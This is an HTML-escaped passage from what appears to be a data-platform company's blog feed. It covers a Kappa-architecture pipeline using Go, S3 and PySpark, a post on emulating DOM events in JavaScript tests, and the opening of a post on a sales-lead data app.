    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; datalake&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;dl_raw&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// stream orders data to AWS S3&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that the data is flowing, you can &lt;a href=&quot;https://materialize.com/docs/integrations/metabase/&quot;&gt;use a BI tool like Metabase to query the data in Materialize&lt;/a&gt; for real-time data analysis or to build dashboards.&lt;/p&gt;
&lt;h3&gt;Processing Data from S3 with Spark&lt;/h3&gt;
&lt;p&gt;As data flows into your data lake in real-time, you can process and analyze it utilizing Spark. In S3, Turbine stores the data from PostgreSQL as one line, gzipped JSON as seen below.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Kappa%20Architecture%20Blog%20Post_Image%203.png&quot; alt=&quot;Kappa Architecture Blog Post_Image 3&quot;&gt;Postgres CDC data in S3&lt;/p&gt;
&lt;p&gt;The schema of the gzipped record looks like the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;turbine-demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;struct&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;fields&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int32&quot;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;devaris@devaris.com&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To read that data in Spark and write out to another S3 bucket, it’s pretty trivial to do with [PySpark](&lt;a href=&quot;https://spark.apache.org/docs/latest/api/python/#:~:text=PySpark&quot;&gt;https://spark.apache.org/docs/latest/api/python/#:~:text=PySpark&lt;/a&gt; is an interface for,data in a distributed environment) as seen below.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; pyspark

&lt;span class=&quot;token comment&quot;&gt;# Set up a Spark Session and your S3 config&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; pyspark &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; SparkConf
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; pyspark&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sql &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; SparkSession

conf &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; SparkConf&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.jars.packages&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;org.apache.hadoop:hadoop-aws:3.2.0&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.aws.credentials.provider&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;org.apache.hadoop.fs.s3a.TemporaryAWSCredentialsProvider&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.access.key&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.secret.key&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.session.token&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

spark &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; SparkSession&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;config&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;conf&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;conf&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getOrCreate&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Read data from the CSV&lt;/span&gt;
df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; spark&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;read&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;json&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3a://dl_raw/file.jl.gz&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Do some processing on the dataframe then write to a new bucket in CSV format&lt;/span&gt;
df&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;write&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;format&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;csv&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;option&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;header&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;true&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;save&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3a://dl_processed_csv&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Deploying&lt;/h3&gt;
&lt;p&gt;Now that the application is complete, we can deploy the solution in a single command. The Meroxa Platform sets up all the connections and orchestrates the data in real-time so you don’t have to worry about the operational complexity.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy pg_kappa  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The Meroxa platform and our Turbine SDK take the complexity out of operating and leveraging the Kappa Architecture. With less than 20 lines of code, we were able to deploy a solution that enables real-time analytics with Materialize and leveraged Spark’s stream processing for ML, Data Science, etc… in a separate workflow.&lt;/p&gt;
&lt;p&gt;We can’t wait to see what you build 🚀&lt;/p&gt;
&lt;p&gt;Get started by &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;requesting a free demo of Meroxa&lt;/a&gt;. Your app could also be featured in our Data App Spotlight series. If you’d like to see more data app examples, please feel free to make your request in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Better Test User Interactions in JavaScript Apps with Emulated Events]]></title><description><![CDATA[When automated testing of JavaScript apps, it is key to verify the app state is changing as expected. By emulating the DOM events in automated tests, you get closer to mimicking the app’s behavior accurately.]]></description><link>https://meroxa.com/blog/better-test-user-interactions-in-javascript-apps-w-emulated-events</link><guid isPermaLink="false">https://meroxa.com/blog/better-test-user-interactions-in-javascript-apps-w-emulated-events</guid><dc:creator><![CDATA[Jesse Jordan]]></dc:creator><pubDate>Mon, 29 Aug 2022 23:45:25 GMT</pubDate><content:encoded>&lt;p&gt;For over a decade, single-page web applications have been on the rise and continue to be a popular medium for modern web experiences today. Digital products such as Twitter, Gmail, LinkedIn, and Netflix, as well as &lt;a href=&quot;https://dashboard.meroxa.io&quot;&gt;our dashboard at Meroxa&lt;/a&gt;, are such &lt;strong&gt;JavaScript applications&lt;/strong&gt; and are served to billions of users every day.&lt;/p&gt;
&lt;p&gt;To guarantee the delivery of high-quality software, engineering teams implementing modern web applications must not only dedicate time to the development of new features or the maintenance of already existing code, but also to the verification of application behavior through manual and &lt;strong&gt;automated testing&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;When it comes to automated testing of JavaScript applications, it is key to verify the &lt;strong&gt;application state&lt;/strong&gt; is changing as expected over time. The state of JavaScript applications is defined by a continuous &lt;strong&gt;sequence of user interactions&lt;/strong&gt; and &lt;strong&gt;browser events&lt;/strong&gt;. In some cases, the actual user interaction can not be replicated in a test easily — but the underlying events may be.&lt;/p&gt;
&lt;p&gt;By &lt;strong&gt;emulating&lt;/strong&gt; the &lt;strong&gt;DOM&lt;/strong&gt; (Document Object Model) &lt;strong&gt;events&lt;/strong&gt; in our automated tests, we get closer to mimicking our app’s behavior accurately. In this article, you’ll learn what DOM events are and how you can leverage them in your testing approach for more reliable test coverage.&lt;/p&gt;
&lt;h2&gt;What is a DOM event?&lt;/h2&gt;
&lt;p&gt;A &lt;a href=&quot;https://www.w3.org/TR/DOM-Level-2-Events/events.html&quot;&gt;DOM event&lt;/a&gt; signals occurrences in a web app, such as a user interaction (e.g. a user hovering over a button element) or another event-triggering action, that is unrelated to user behavior (e.g. the browser finishing to load a web page). DOM events can be used to &lt;strong&gt;run&lt;/strong&gt; a single or a set of multiple &lt;strong&gt;functions&lt;/strong&gt; inside of a JavaScript application, at a specific point in time — specifically &lt;strong&gt;whenever the associated DOM event&lt;/strong&gt; is triggered.&lt;/p&gt;
&lt;p&gt;User interactions prompt many of the DOM events in a JavaScript application’s lifecycle. For example, a user may use a mouse or keyboard device to activate a &lt;code class=&quot;language-text&quot;&gt;&amp;lt;button&gt;&lt;/code&gt; element, triggering many DOM events while doing so, including, but not limited to the &lt;code class=&quot;language-text&quot;&gt;click&lt;/code&gt; event.&lt;/p&gt;
&lt;p&gt;Here’s a typical sequence of the DOM events sent whenever a button is clicked using a mouse device:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;pointerover&lt;/li&gt;
&lt;li&gt;pointerenter&lt;/li&gt;
&lt;li&gt;mouseover&lt;/li&gt;
&lt;li&gt;pointerrawupdate&lt;/li&gt;
&lt;li&gt;pointermove&lt;/li&gt;
&lt;li&gt;mousemove&lt;/li&gt;
&lt;li&gt;pointerdown&lt;/li&gt;
&lt;li&gt;mousedown&lt;/li&gt;
&lt;li&gt;focus&lt;/li&gt;
&lt;li&gt;pointerup&lt;/li&gt;
&lt;li&gt;mouseup&lt;/li&gt;
&lt;li&gt;click&lt;/li&gt;
&lt;li&gt;blur&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In a test environment, e.g. when running our JavaScript application in the context of an automated &lt;a href=&quot;https://jestjs.io/&quot;&gt;Jest&lt;/a&gt; or &lt;a href=&quot;https://qunitjs.com/&quot;&gt;QUnit&lt;/a&gt; test run, it may be helpful for us to emulate such user interactions to verify that the event-driven features we have implemented are working as expected.&lt;/p&gt;
&lt;p&gt;But &lt;em&gt;how&lt;/em&gt; can you assert the sequence of events and associated app state changes in your JavaScript tests? Let’s take a look at an example component.&lt;/p&gt;
&lt;h2&gt;Example: Automated testing of file uploads&lt;/h2&gt;
&lt;p&gt;Imagine we were building an amazing file upload component that allows users to click a button to browse for a file on their machine, select it and then subsequently upload its content to the app.&lt;/p&gt;
&lt;p&gt;If we wrote our app using &lt;strong&gt;&lt;a href=&quot;http://emberjs.com&quot;&gt;EmberJS&lt;/a&gt;&lt;/strong&gt;, as we’re doing for our open-source &lt;a href=&quot;https://github.com/ConduitIO/mx-ui-components&quot;&gt;component library mx-ui-components at Meroxa&lt;/a&gt;, the component may be structured similarly to this:&lt;/p&gt;
&lt;p&gt;And in a similar fashion, we may want to build such a component in a &lt;strong&gt;&lt;a href=&quot;https://reactjs.org/&quot;&gt;React&lt;/a&gt;&lt;/strong&gt; library like this:&lt;/p&gt;
&lt;p&gt;In a production environment, a user can now upload their files using the &lt;code class=&quot;language-text&quot;&gt;&amp;lt;Upload&gt;&lt;/code&gt; component by clicking the &lt;code class=&quot;language-text&quot;&gt;Browse file&lt;/code&gt; button and selecting their file from their local machine.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://blog.meroxa.com/hs-fs/hubfs/findafile-demo.gif?width=1673&amp;#x26;name=findafile-demo.gif&quot; alt=&quot;findafile-demo&quot;&gt;&lt;/p&gt;
&lt;p&gt;In our test suite, natively executing the full user interaction would be impossible: when our tests run in our &lt;strong&gt;continuous integration&lt;/strong&gt; workflow, we won’t have easy access to the file directory of the remote machine from which a file is supposed to be selected for upload.&lt;/p&gt;
&lt;p&gt;Instead of uploading a real file in our automated test, we can &lt;strong&gt;emulate the file upload event&lt;/strong&gt; that results from the user interaction; this way, we can test if any associated event listeners and subsequent state changes in our JavaScript app are working as expected.&lt;/p&gt;
&lt;p&gt;While building a web application using a &lt;strong&gt;JavaScript framework&lt;/strong&gt;, you may benefit from the comfort of using &lt;strong&gt;compatible testing libraries&lt;/strong&gt;, such as &lt;a href=&quot;https://qunitjs.com/&quot;&gt;QUnit&lt;/a&gt;, &lt;a href=&quot;https://github.com/emberjs/ember-test-helpers/blob/master/API.md&quot;&gt;@ember/test-helpers&lt;/a&gt; or &lt;a href=&quot;https://jestjs.io/&quot;&gt;Jest&lt;/a&gt; in combination with &lt;a href=&quot;https://testing-library.com/&quot;&gt;@testing-library/react&lt;/a&gt;, which will make emulating custom events even easier.&lt;/p&gt;
&lt;p&gt;Let’s leverage &lt;em&gt;Ember&lt;/em&gt; ’s &lt;code class=&quot;language-text&quot;&gt;triggerEvent&lt;/code&gt; function to test the file upload behavior of our &lt;code class=&quot;language-text&quot;&gt;&amp;lt;Upload /&gt;&lt;/code&gt; component shown earlier:&lt;/p&gt;
&lt;p&gt;In a React app on the other hand, we can assert the same user flow using the handy helper methods from &lt;code class=&quot;language-text&quot;&gt;@testing-library&lt;/code&gt; in a similar manner:&lt;/p&gt;
&lt;h2&gt;Other approaches for testing events in your tests&lt;/h2&gt;
&lt;p&gt;If you don’t have a developer-friendly testing library for your use case, you can create your own testing helper library for easy reuse in many different JavaScript-based projects.&lt;/p&gt;
&lt;h3&gt;Mimicking common user actions in plain JavaScript&lt;/h3&gt;
&lt;p&gt;Many HTML elements have built-in methods for programmatically triggering common user interactions on them, which makes testing user flows more straightforward.&lt;/p&gt;
&lt;p&gt;For example, if we wanted to mock a user clicking a button element, we could emulate this as follows in our integration test:&lt;/p&gt;
&lt;p&gt;Sometimes we would like to assert an application state change in our automated test that is elicited by a DOM event for which there is no corresponding DOM element method, such as &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/click&quot;&gt;element.click&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What if we updated our app state anytime a user was starting and stopping to hover over the button mentioned in the example above, regardless if the button was clicked or not? In that case, we might want to emulate the &lt;code class=&quot;language-text&quot;&gt;mouseenter&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;mouseleave&lt;/code&gt; events instead and verify that our JavaScript application is still behaving as expected.&lt;/p&gt;
&lt;h3&gt;Emulating any DOM event&lt;/h3&gt;
&lt;p&gt;For such test scenarios based on less common DOM events, we can leverage the &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt; API:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;dispatchEvent()&lt;/code&gt;&lt;/strong&gt; method of the &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget&quot;&gt;EventTarget&lt;/a&gt; sends an &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/Event&quot;&gt;Event&lt;/a&gt; to the object, (synchronously) invoking the affected &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener&quot;&gt;EventListener&lt;/a&gt;s in the appropriate order.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;from &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/dispatchEvent&quot;&gt;the MDN docs on &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Any DOM event can be &lt;strong&gt;programmatically triggered&lt;/strong&gt; where needed, by calling the &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt; method on the target element:&lt;/p&gt;
&lt;p&gt;In our file upload component example from above, we could write our own test helper to emulate the feature functionality. Using the &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt; method in combination with the &lt;code class=&quot;language-text&quot;&gt;change&lt;/code&gt; event in our test helper util already does the trick:&lt;/p&gt;
&lt;h2&gt;That’s a wrap!&lt;/h2&gt;
&lt;p&gt;Whether you’re using a framework or plain old JavaScript to build out your web apps and components, &lt;strong&gt;testing event-driven behavior&lt;/strong&gt; has never been easier. By using testing libraries or comprehensive Web APIs, &lt;strong&gt;emulating events&lt;/strong&gt; in unit and integration tests is a breeze.&lt;/p&gt;
&lt;p&gt;Have thoughts, questions or recommendations on how you can test events in JavaScript? Let us know in the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Meroxa community&lt;/a&gt; or on Twitter at &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;@meroxadata&lt;/a&gt;!&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;mx-ui-components: &lt;a href=&quot;https://github.com/ConduitIO/mx-ui-components&quot;&gt;https://github.com/ConduitIO/mx-ui-components&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;dispatchEvent Web API: &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/dispatchEvent&quot;&gt;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/dispatchEvent&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Document Object Model Events: &lt;a href=&quot;https://www.w3.org/TR/DOM-Level-2-Events/events.html&quot;&gt;https://www.w3.org/TR/DOM-Level-2-Events/events.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;QUnit: &lt;a href=&quot;https://qunitjs.com/&quot;&gt;https://qunitjs.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Ember: &lt;a href=&quot;http://emberjs.com&quot;&gt;emberjs.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Ember Test Helpers API: &lt;a href=&quot;https://github.com/emberjs/ember-test-helpers/blob/master/API.md&quot;&gt;https://github.com/emberjs/ember-test-helpers/blob/master/API.md&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;React: &lt;a href=&quot;https://reactjs.org/&quot;&gt;https://reactjs.org/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Jest: &lt;a href=&quot;https://jestjs.io/&quot;&gt;https://jestjs.io/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;@testing/library: &lt;a href=&quot;https://testing-library.com/&quot;&gt;https://testing-library.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Prospector: Turbine Data App for Generating Qualified Sales Leads]]></title><description><![CDATA[Using Turbine to build a data app to help source new sales leads helps small sales teams scale.]]></description><link>https://meroxa.com/blog/prospector-meroxa-turbine-data-app-for-generating-qualified-sales-leads</link><guid isPermaLink="false">https://meroxa.com/blog/prospector-meroxa-turbine-data-app-for-generating-qualified-sales-leads</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 25 Aug 2022 18:23:06 GMT</pubDate><content:encoded>&lt;p&gt;Like many early-stage startups, being stretched thin for resources is commonplace. We recently hired a VP of Sales to execute our go-to-market strategy. However, we quickly realized sourcing new leads was a bottleneck without dedicated SDR resources.&lt;/p&gt;
&lt;p&gt;After speaking with Jamie, I realized parts of the lead generation process could be automated with a data application that wouldn’t require us to use a combination of expensive SaaS platforms. We would need to develop a way to query and search companies with specific criteria, find contact information for our ideal customer profile at the company, and send them a message. We came up with the following workflow:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Sales%20Lead%20Data%20App%20Blog%20Post_Image%201.png&quot; alt=&quot;Sales Lead Data App Blog Post_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;The sales team can query &lt;a href=&quot;https://crunchbase.com&quot;&gt;Crunchbase&lt;/a&gt; and export a CSV. This could be automated via their API, but it would require us to sign a pricey Enterprise agreement. The engineering team built a S3 uploader for the sales team to upload the exported CSVs to an AWS S3 bucket so the Meroxa Turbine data app can take over. Once we have the company URL, we can query external APIs for enrichment before orchestrating the data into Salesforce. Once that is complete we can send it to Slack to notify the sales team of a new lead has been created and then send it onto Postgres for additional analysis with SQL.&lt;/p&gt;
&lt;h2&gt;Show Me the Code!&lt;/h2&gt;
&lt;h3&gt;Turbine Data App Requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/download/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
